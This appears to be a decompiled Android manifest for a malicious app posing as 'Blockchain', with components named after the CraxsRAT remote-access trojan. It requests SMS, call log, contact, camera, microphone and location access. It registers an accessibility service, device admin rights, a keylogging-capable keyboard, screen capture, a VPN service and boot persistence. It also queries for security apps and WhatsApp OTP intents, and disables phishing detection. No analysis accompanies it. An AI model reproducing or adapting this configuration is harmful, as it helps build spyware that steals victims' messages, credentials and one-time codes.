<?xml version="1.0" encoding="utf-8"?>
<manifest
    android:compileSdkVersion="23"
    android:compileSdkVersionCodename="6.0-2438415"
    package="com.deny.charges"
    platformBuildVersionCode="23"
    platformBuildVersionName="6.0-2438415"
    xmlns:android="http://schemas.android.com/apk/res/android">
    <!-- Allows the app to send SMS messages. This may result in unexpected charges. Malicious apps may cost you money by sending messages without your confirmation. -->
    <uses-permission
        android:name="android.permission.SEND_SMS" />
    <!-- Allows the app to set the system wallpaper. -->
    <uses-permission
        android:name="android.permission.SET_WALLPAPER" />
    <!-- This app can read all SMS (text) messages stored on your phone. -->
    <uses-permission
        android:name="android.permission.READ_SMS" />
    <!-- This app can read your call history. -->
    <uses-permission
        android:name="android.permission.READ_CALL_LOG" />
    <!-- Allows the app to read data about your contacts stored on your phone. Apps will also have access to the accounts on your phone that have created contacts. This may include any accounts created by apps that you have installed. This permission allows any apps to save your contact data, and malicious apps may share contact data without your knowledge. -->
    <uses-permission
        android:name="android.permission.READ_CONTACTS" />
    <!-- Allows the app to get the list of accounts known by the phone. This may include any accounts created by applications that you have installed. -->
    <uses-permission
        android:name="android.permission.GET_ACCOUNTS" />
    <!-- This app can take pictures and record videos using the camera while the app is in use. -->
    <uses-permission
        android:name="android.permission.CAMERA" />
    <!-- This app can record audio using the microphone while the app is in use. -->
    <uses-permission
        android:name="android.permission.RECORD_AUDIO" />
    <!-- This app can get your approximate location from Location Services while the app is in use. Location Services for your device must be turned on for the app to get location. -->
    <uses-permission
        android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <!-- This app can get your precise location from Location Services while the app is in use. Location Services for your device must be turned on for the app to get location. This may increase battery usage. -->
    <uses-permission
        android:name="android.permission.ACCESS_FINE_LOCATION" />
    <!-- Allows the app to call phone numbers without your intervention. This may result in unexpected charges or calls. Note that this doesn't allow the app to call emergency numbers. Malicious apps may cost you money by making calls without your confirmation. -->
    <uses-permission
        android:name="android.permission.CALL_PHONE" />
    <!-- Allows the app to disable the keylock and any associated password security. For example, the phone disables the keylock when receiving an incoming phone call, then re-enables the keylock when the call is finished. -->
    <uses-permission
        android:name="android.permission.DISABLE_KEYGUARD" />
    <!-- Allows the app to make use of foreground services. -->
    <uses-permission
        android:name="android.permission.FOREGROUND_SERVICE" />
    <!-- Allows the app to read the contents of your shared storage. -->
    <uses-permission
        android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <!-- Allows the app to have itself started as soon as the system has finished booting. This can make it take longer to start the phone and allow the app to slow down the overall phone by always running. -->
    <uses-permission
        android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <!-- Allows the app to write the contents of your shared storage. -->
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <!-- Allows the app to have itself started as soon as the system has finished booting. This can make it take longer to start the phone and allow the app to slow down the overall phone by always running. -->
    <uses-permission
        android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission
        android:name="oppo.permission.OPPO_COMPONENT_SAFE" />
    <uses-permission
        android:name="oplus.permission.OPLUS_COMPONENT_SAFE" />
    <uses-permission
        android:name="com.huawei.permission.external_app_settings.USE_COMPONENT" />
    <!-- Allows the app to create network sockets and use customised network protocols. The browser and other applications provide means to send data to the Internet, so this permission is not required to send data to the Internet. -->
    <uses-permission
        android:name="android.permission.INTERNET" />
    <queries>
        <package
            android:name="com.orca" />
        <intent>
            <action
                android:name="android.intent.action.VIEW" />
            <data
                android:scheme="https"
                android:host="messenger.com" />
        </intent>
        <package
            android:name="zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.vending.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7" />
        <package
            android:name="ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.vending.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.id" />
        <package
            android:name="shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.android.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.id" />
        <package
            android:name="com.adsmanager" />
        <package
            android:name="com.analytics" />
        <package
            android:name="com.talk" />
        <package
            android:name="com.miui.securitycenter" />
        <package
            android:name="com.miui.permcenter" />
        <package
            android:name="com.letv.android.letvsafe" />
        <package
            android:name="com.asus.mobilemanager" />
        <package
            android:name="com.huawei.systemmanager" />
        <package
            android:name="com.coloros.safecenter" />
        <package
            android:name="com.oppo.safe" />
        <package
            android:name="com.iqoo.secure" />
        <package
            android:name="com.vivo.permissionmanager" />
        <package
            android:name="com.evenwell.powersaving" />
        <package
            android:name="com.samsung.android" />
        <package
            android:name="com.oneplus" />
        <package
            android:name="com.oplus" />
        <package
            android:name="com.oplus.battery" />
        <package
            android:name="com.android.settings" />
        <package
            android:name="com.arstudio.player" />
        <package
            android:name="com.instagram.boomerang" />
        <package
            android:name="com.katana" />
        <package
            android:name="com.lite" />
        <package
            android:name="com.instagram.android" />
        <package
            android:name="com.oculus.home" />
        <package
            android:name="com.oculus.horizon" />
        <intent>
            <action
                android:name="android.intent.deny.VIEW" />
            <data
                android:mimeType="*/*" />
        </intent>
        <intent>
            <action
                android:name="android.deny.action.SEND" />
            <data
                android:mimeType="*/*" />
        </intent>
        <intent>
            <action
                android:name="deny.intent.action.PICK" />
            <data
                android:mimeType="*/*" />
        </intent>
        <intent>
            <action
                android:name="android.intent.action.MAIN" />
            <category
                android:name="android.deny.category.HOME" />
        </intent>
        <intent>
            <action
                android:name="android.intent.deny.SEND_MULTIPLE" />
            <data
                android:mimeType="*/*" />
        </intent>
        <package
            android:name="com.services" />
        <intent>
            <action
                android:name="com.whatsapp.action.INSTRUMENTATION_CALLBACK_SERVICE" />
        </intent>
        <intent>
            <action
                android:name="whatsapp.payments.intent.action.STEP_UP" />
        </intent>
        <package
            android:name="com.google.android.apps.pixelmigrate" />
        <package
            android:name="com.google.android.apps.restore" />
        <package
            android:name="com.whatsapp.w4b" />
        <intent>
            <action
                android:name="com.whatsapp.otp.OTP_RETRIEVED" />
        </intent>
        <package
            android:name="com.google.android.apps.maps" />
        <package
            android:name="ohxnszblnlphdlccmrqhflsmblititwauuxtlxrwyyuukhqdvd12.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.vending.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.apk.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7" />
        <package
            android:name="zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.vending.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.id" />
        <package
            android:name="shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.android.ynewzltfzsxqzxmkobjmfbliqmxvkkogabkfmyheqgzsoygtkl13.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.id" />
        <package
            android:name="present.vsnet.mr" />
        <package
            android:name="specializing.thinkpad.belongs" />
        <package
            android:name="jtbyipurzduatsenogdrzekgmktmlfdngkwflvninftrgoqoks14.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.vending.derived.apk.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7" />
        <package
            android:name="zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.jtbyipurzduatsenogdrzekgmktmlfdngkwflvninftrgoqoks14.vending.derived.shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.id" />
        <package
            android:name="shjdltejgbqjdvzfxexafsftqwynwjmowrclyawfahjlzrmids7.android.jtbyipurzduatsenogdrzekgmktmlfdngkwflvninftrgoqoks14.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.zstarqjujfswzvzkldtftphtsgwbeabjmvjnfszylzcyjwlhwd31.id" />
    </queries>
    <!-- This app can appear on top of other apps or other parts of the screen. This may interfere with normal app usage and change the way that other apps appear. -->
    <uses-permission
        android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <!-- Allows the app to access the phone features of the device. This permission allows the app to determine the phone number and device IDs, whether a call is active and the remote number connected by a call. -->
    <uses-permission
        android:name="android.permission.READ_PHONE_STATE" />
    <!-- Allows the app to prevent the phone from going to sleep. -->
    <uses-permission
        android:name="android.permission.WAKE_LOCK" />
    <!-- Allows the app to set an alarm in an installed alarm clock app. Some alarm clock apps may not implement this feature. -->
    <uses-permission
        android:name="com.android.alarm.permission.SET_ALARM" />
    <!-- Allows the app to view information about network connections such as which networks exist and are connected. -->
    <uses-permission
        android:name="android.permission.ACCESS_NETWORK_STATE" />
    <!-- Allows the app to view information about Wi-Fi networking, such as whether Wi-Fi is enabled and name of connected Wi-Fi devices. -->
    <uses-permission
        android:name="android.permission.ACCESS_WIFI_STATE" />
    <!-- Allows the app to connect to and disconnect from Wi-Fi access points and to make changes to device configuration for Wi-Fi networks. -->
    <uses-permission
        android:name="android.permission.CHANGE_WIFI_STATE" />
    <!-- Allows an app to ask for permission to ignore battery optimisations for that app. -->
    <uses-permission
        android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <!-- Allows an application to request installation of packages. -->
    <uses-permission
        android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
    <!-- Allows an application to request deletion of packages. -->
    <uses-permission
        android:name="android.permission.REQUEST_DELETE_PACKAGES" />
    <!-- Allows the app to display notifications as full screen activities on a locked device -->
    <uses-permission
        android:name="android.permission.USE_FULL_SCREEN_INTENT" />
    <application
        android:theme="@android:style/Theme.Translucent.NoTitleBar"
        android:label="@string/trademarks59"
        android:icon="@drawable/claimedw70"
        android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.MyApplication"
        android:installLocation="internalOnly"
        android:hardwareAccelerated="true"
        android:largeHeap="true"
        android:supportsRtl="true"
        android:usesCleartextTraffic="true"
        android:appComponentFactory="androidx.core.app.CoreComponentFactory"
        android:requestLegacyExternalStorage="true">
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label="Blockchain"
            android:icon="@drawable/skinicon"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.MainActivity"
            android:enabled="true"
            android:exported="true"
            android:taskAffinity="app.one"
            android:screenOrientation="sensor"
            android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|screenSize|smallestScreenSize|uiMode"
            android:hardwareAccelerated="true">
            <intent-filter>
                <action
                    android:name="android.intent.action.MAIN" />
                <category
                    android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:icon="@drawable/minnesotai71"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.isrjhroorjshhuhvaoyxhzihjosgyxaalfopwxsqtcaxyhmbzs20"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:icon="@drawable/minnesotai71"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.FloatingView"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:icon="@drawable/minnesotai71"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ymohvcbrknsnxeoujrdhblrwadynhwynfqzklncagrzgjnbnxk4.CraxsBrowser"
            android:exported="true"
            android:screenOrientation="sensor"
            android:configChanges="keyboard|keyboardHidden|orientation|screenLayout|screenSize|smallestScreenSize|uiMode" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label="Play Store"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.CameraActvity"
            android:exported="true"
            android:excludeFromRecents="true"
            android:showForAllUsers="true">
            <intent-filter>
                <action
                    android:name="com.deny.charges.xyz" />
            </intent-filter>
        </activity>
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestScreenCap"
            android:exported="true"
            android:excludeFromRecents="true"
            android:showForAllUsers="true"
            android:turnScreenOn="true" />
        <provider
            android:name="androidx.core.content.FileProvider"
            android:exported="false"
            android:authorities="com.deny.charges.provider"
            android:grantUriPermissions="true">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/prov_path" />
        </provider>
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.SecondActivity"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.WakeupActivity"
            android:exported="true"
            android:excludeFromRecents="true"
            android:showForAllUsers="true"
            android:turnScreenOn="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label=" "
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestUninstall"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestInstallPrim"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.installupdate"
            android:exported="true"
            android:excludeFromRecents="true" />
        <receiver
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ajfzohvjgwjouuagessauzaxzxmirruovuzkddzvvswwcyyfte5.CustomReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action
                    android:name="com.deny.charges.RestartSensor" />
            </intent-filter>
        </receiver>
        <service
            android:label="@string/trademarks59"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.initializeService"
            android:enabled="true"
            android:stopWithTask="false" />
        <service
            android:label="@string/trademarks59"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ymohvcbrknsnxeoujrdhblrwadynhwynfqzklncagrzgjnbnxk4.CameraHandler"
            android:enabled="true" />
        <service
            android:label="@string/trademarks59"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.LocationService"
            android:enabled="true" />
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.AccessService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="true"
            android:stopWithTask="false">
            <intent-filter
                android:priority="999">
                <action
                    android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessdiecrip" />
        </service>
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.BackgroundWorker"
            android:enabled="true"
            android:exported="true" />
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.tiioyslylawbjfcuduydnfhcaxjywhxvgxwusxnoltefbuxqqj38"
            android:enabled="true"
            android:stopWithTask="false"
            android:foregroundServiceType="mediaPlayback" />
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.FirewallServices"
            android:permission="android.permission.BIND_VPN_SERVICE"
            android:enabled="true"
            android:exported="true"
            android:stopWithTask="false">
            <intent-filter>
                <action
                    android:name="android.net.VpnService" />
            </intent-filter>
        </service>
        <receiver
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ajfzohvjgwjouuagessauzaxzxmirruovuzkddzvvswwcyyfte5.BootReceiver"
            android:permission="android.permission.RECEIVE_BOOT_COMPLETED"
            android:enabled="true"
            android:exported="true">
            <intent-filter
                android:priority="999">
                <category
                    android:name="android.intent.category.DEFAULT" />
                <action
                    android:name="android.intent.action.BOOT_COMPLETED" />
                <action
                    android:name="android.intent.action.ACTION_BOOT_COMPLETED" />
                <action
                    android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action
                    android:name="com.htc.intent.action.QUICKBOOT_POWERON" />
                <action
                    android:name="android.intent.action.REBOOT" />
                <action
                    android:name="android.intent.action.LOCKED_BOOT_COMPLETED" />
                <action
                    android:name="miui.intent.action.BOOT_COMPLETEDT" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ajfzohvjgwjouuagessauzaxzxmirruovuzkddzvvswwcyyfte5.PackagesReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action
                    android:name="android.intent.action.PACKAGE_INSTALL" />
                <action
                    android:name="android.intent.action.PACKAGE_ADDED" />
                <action
                    android:name="android.intent.action.PACKAGE_REMOVED" />
                <action
                    android:name="android.intent.action.PACKAGE_ADDED" />
                <action
                    android:name="android.intent.action.PACKAGE_CHANGED" />
                <action
                    android:name="android.intent.action.MY_PACKAGE_REPLACED" />
                <data
                    android:scheme="package" />
            </intent-filter>
        </receiver>
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label="Settings"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.flyActivity"
            android:exported="true"
            android:taskAffinity="app.two"
            android:finishOnTaskLaunch="false"
            android:launchMode="singleInstance"
            android:finishOnCloseSystemDialogs="false"
            android:showOnLockScreen="true"
            android:elevation="0.0dip"
            android:showForAllUsers="true"
            android:showWhenLocked="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label="Settings"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.OpenActivity"
            android:exported="true"
            android:launchMode="singleTop"
            android:elevation="0.0dip" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:label="Settings"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.OpenChrome"
            android:exported="true"
            android:launchMode="singleTop"
            android:elevation="0.0dip" />
        <meta-data
            android:name="com.google.android.maps.v2.API_KEY"
            android:value="jtbyipurzduatsenogdrzekgmktmlfdngkwflvninftrgoqoks14" />
        <meta-data
            android:name="com.google.android.gms.car.application"
            android:value="1" />
        <meta-data
            android:name="com.google.android.gms.version"
            android:value="13547000" />
        <meta-data
            android:name="com.google.android.ALLOW_PHISHING_DETECTION"
            android:value="false" />
        <meta-data
            android:name="com.sec.android.support.multiwindow"
            android:value="true" />
        <meta-data
            android:name="com.sec.android.multiwindow.DEFAULT_SIZE_W"
            android:value="632.0dip" />
        <meta-data
            android:name="com.sec.android.multiwindow.DEFAULT_SIZE_H"
            android:value="598.0dip" />
        <meta-data
            android:name="com.sec.android.multiwindow.MINIMUM_SIZE_W"
            android:value="632.0dip" />
        <meta-data
            android:name="com.sec.android.multiwindow.MINIMUM_SIZE_H"
            android:value="598.0dip" />
        <meta-data
            android:name="android.max_aspect"
            android:value="2.1" />
        <receiver
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ajfzohvjgwjouuagessauzaxzxmirruovuzkddzvvswwcyyfte5.ScreenReceiver"
            android:exported="true">
            <intent-filter>
                <action
                    android:name="android.intent.action.SCREEN_ON" />
                <action
                    android:name="android.intent.action.SCREEN_OFF" />
                <action
                    android:name="android.intent.action.ACTION_POWER_CONNECTED" />
                <action
                    android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
                <action
                    android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.umcahpnqwnqdjkepksicqyrivivsooegfsfdidyvvmkymgdmro27ture"
            android:enabled="true"
            android:exported="true"
            android:foregroundServiceType="mediaProjection" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lbmvkgmomdnnhihblocwyefblihcjgesagwgjogdnbygtljrjx22Over"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestDataUsage"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestVPN"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.nucrjhkdaychvndkhathhfszajkutofqbnemdfxqktrjpsklgl29"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestOPPOB"
            android:exported="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestPermission2"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestKeyboard"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.fgggyjcnlusrcshwnemydijbndqyawzbffmtgvisnvxfizqkgt21"
            android:exported="true"
            android:excludeFromRecents="true" />
        <activity
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.RequestAdmin"
            android:exported="true" />
        <service
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.MyJobService"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:enabled="true"
            android:exported="true" />
        <meta-data
            android:name="com.android.dynamic.apk.fused.modules"
            android:value="base" />
        <meta-data
            android:name="com.android.stamp.source"
            android:value="https://play.google.com/store" />
        <meta-data
            android:name="com.android.stamp.type"
            android:value="STAMP_TYPE_STANDALONE_APK" />
        <meta-data
            android:name="com.android.vending.derived.apk.id"
            android:value="1" />
        <receiver
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.ajfzohvjgwjouuagessauzaxzxmirruovuzkddzvvswwcyyfte5.Datareciver"
            android:exported="true">
            <intent-filter>
                <action
                    android:name="android.intent.action.DATE_CHANGED" />
            </intent-filter>
        </receiver>
        <receiver
            android:label="@string/virginyvictorq57"
            android:name="com.deny.AdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN"
            android:exported="true"
            android:description="@string/breakfastu56">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/adm_rit" />
            <intent-filter>
                <action
                    android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <service
            android:label="Simple Keyboard"
            android:icon="@drawable/minnesotai71"
            android:name="com.deny.vhasjbytsejmchjytybqaiucxsovcftvkngegomeqdvgmgvqzg2.lrnkvbkuoyhwwjjclyatabmdqjrxgnnkcjvzuleormlwhiwnjt3.KeyboardService"
            android:permission="android.permission.BIND_INPUT_METHOD"
            android:exported="true">
            <meta-data
                android:name="android.view.im"
                android:resource="@xml/method" />
            <intent-filter>
                <action
                    android:name="android.view.InputMethod" />
            </intent-filter>
        </service>
        <provider
            android:name="androidx.core.content.FileProvider"
            android:exported="false"
            android:authorities="com.deny.charges.provider"
            android:grantUriPermissions="true">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/prov_path" />
        </provider>
    </application>
</manifest>